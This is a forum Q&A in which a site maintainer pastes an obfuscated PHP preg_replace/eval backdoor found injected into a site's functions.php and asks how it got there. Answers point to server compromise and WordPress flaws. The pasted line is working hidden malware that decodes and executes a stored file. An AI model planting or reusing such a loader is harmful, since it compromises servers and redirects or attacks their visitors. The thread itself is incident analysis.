# Injection of PHP code to perform a 301

Tags: php, apache

Some how I have managed to be attacked in a very specific manner on a site I help mantain and I am looking into whether or not the server was directly hacked or someone was able to inject the malicious script somehow.

First someone managed to get this:

```
@preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x62\146\x77\75\x39\60\x35\70\x37\73","\x4c\62\x35\157\x59\156\x4d\166\x64\62\x56\151\x4c\62\x78\160\x64\155\x55\166\x61\110\x52\153\x62\62\x4e\172\x4c\63\x52\154\x63\63\x51\166\x62\107\x56\62\x5a\127\x77\171\x58\63\x52\154\x63\63\x51\166\x62\107\x39\156\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");
```

Into the very top of a PHP file right after the files comments. What this, and most likey other code did, was 301 redirect anyone not connecting to the site through a browser to a payday loan site. This ONLY effected my homepage, all other pages where fine.

There was probably more code to do it but this was the most confusing part since this code sits in a file called `functions.php` which is only ever included however IT IS the first file to be included within index.php (my homepage).

It is completely confusing me how some one could have got code there without directly hacking the server, there is no user input used there, it is literally sitting above the entire file. There is nothing there except this injected code and some comments above.

My envo is:

> Gentoo
>
> PHP 5.2.14-pl0-gentoo
>
> Apache 2

I have checked server logs however, as usual, they deleted their trail.

This is also partly, as you have noticed, a server question but atm it is 90% programming question so I thought I would ask it here first.

Is there any vulnerability within PHP that could cause this?

If you need clarification let me know.

### Edit

I have a staging system which has a

- Work
- Preview
- Live

I know this is nothing to do with SQL injection since if I switch live and preview folder around I get no problems. I also do not store the gentoo password within the DB or the App and you can only connect to the server in a small range of IP addresses except for Apache which accept 80 and 443 connections from any host. Plus I use SQL escaping classes and methods within the site (PDO, MySQLi etc).

So this problem (which is even more confusing) is only located within one copy of my site and not the DB or anything.

Comment: @MihaiIorga I thought that superuser was for a different flavour of question than this, that if this question was to be categorised another way it would be serverfault

Comment: Your web server would require write access to the PHP files in order for this to happen. I would definitely recommend 664 for your script permissions

Comment: @Dave In what sense? I am still unsure how some one could use write permissions to my PHP scripts to do this without going on the server directly. They are actually not writeable by the webuser as well.

Comment: They would have to be able to inject code onto your server in some way (such as an upload form or whatnot), then said code would have to write out to other files. This would only be possible if the web server has write permissions to the file, but is a complete long shot. From the description, it sounds more likely that the hacker gained some sort of shell access vs. an apache/code exploit

Comment: @Dave Yea I think it was the latter I don't have an upload form however the main question is whether some one knows of a vulnerability in PHP, one that I cna take a precaution against, that could allow this. It is starting to sound more like some one was able to gain shell access another way some how, not sure with a whitelist IP list tbh

Answer (score 0, accepted):

Ok so I understand how and why now. It was the one thing I thought it would never be: Wordpress.

I was basically a victim of: http://muninn.net/blog/2012/06/a-tale-of-east-asian-history-british-loan-sharks-and-a-russian-hacker.html

Using a tool like: http://www.youtube.com/watch?v=y-Z5-uHvONc

You see even though my main site is not made from wordpress and it has got a wordpress blog located at: `/blog/` the hacker was able to use various Wordpress vulnerabilities to get around the location problem and plant scripts on any part of the server.

By the way, this actually happened on the latest install of Wordpress. Double checked the version. We are not totally sure exactly when he placed the script (there are multiple instances of the foreign script being placed throughout the years!) but we do know this recent attack must have been sited also quite recently which puts the latest version (or the version before) under a huge amount of scrutiny.

So a nice note of caution about Wordpress there...

Answer (score 2):

Pinpointing this kind of things is more on the server admin side I guess. Check the attacker-modified file date, and look for for suspicious activity in that date and time in the server's log (apache logs, FTP logs, ssh logs maybe). This also may depend on your traffic, log size, and level of access to your server, as it may be prohibitive. If you have any html form that upload files, verify the directory in wich the files are stored for [php shells](http://mikeybeck.com/hacking/) . Also check the permissions on that directory. If you are on a shared hosting, this also can be the result of the attacker injecting a shell on another site, and then attacking yours by that mean. In that case contact your hosting company.

Comment: Awesome that's given me a few things, but yea that's two answers for server problem

Answer (score 1):

It's 99% chance the webserver fault, SQL injection is one thing, but I don't know, maybe they managed to somehow get your password with SQL injection and then log in to a control panel or ftp, but, I'd say it's the webserver.

Comment: Added an edit for clarification, however the more that I think about it the more I think this is a server problem. However I wanna be sure I am not chasing the wrong stick.